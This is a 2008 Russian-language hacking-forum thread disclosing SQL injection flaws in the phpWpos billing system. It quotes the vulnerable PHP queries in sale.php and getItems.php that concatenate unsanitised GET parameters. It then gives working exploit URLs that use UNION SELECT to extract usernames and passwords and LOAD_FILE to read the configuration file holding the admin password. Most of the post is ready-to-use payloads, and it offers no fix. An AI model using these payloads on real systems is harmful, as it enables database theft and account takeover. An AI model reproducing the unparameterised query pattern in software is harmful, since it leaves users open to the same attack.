phpWpos bugs

Discussion in 'Веб-уязвимости' started by Constantine, 18 Feb 2008.

  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    {Некоторые уязвимости в биллинг системе phpWpos}

    Офиц. сайт: http://phpwpos.sourceforge.net/


    1)Sql inj в скрипте sale.php

    PHP:
    <?php
    $sql 
    "select date, sale_sub_total, sale_total_cost from sales where id=" .$_GET['id'];
    $result $db->query($sql);
    $sales_info mysql_fetch_row($result);
    ?>
    Эксплойт
    Code:
    http://localhost/wostest/sale.php?id=2+union+select+concat(password,0x3a,username),2,3+from+users/*
    2)Sql inj в скрипте getItems.php
    PHP:
    $db = new database($dbhost,$dbuser,$dbpassword,$dbname);
    $result $db->query("select id, item_name, image, buy_price, unit_price, tax_percent, total_cost from items where category_id=" .$_GET['category']);

    Эксплойт:

    Code:
    http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a3a3a,id,first_name,last_name,username,password,type)+from+users/*
    {Трабла}
    Парль администратора в БД не содержится, он прописан в конфиге. Для эксплуатации уязвимости требуется: file_priv = Y

    Эксплойт
    http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,LOAD_FILE('\path\site\config.php')/*
     
    3 people like this.
  2. Conquerstador

    Conquerstador Banned

    Joined:
    7 Jul 2007
    Messages:
    124
    Likes Received:
    39
    Reputations:
    -6
    Статья супер!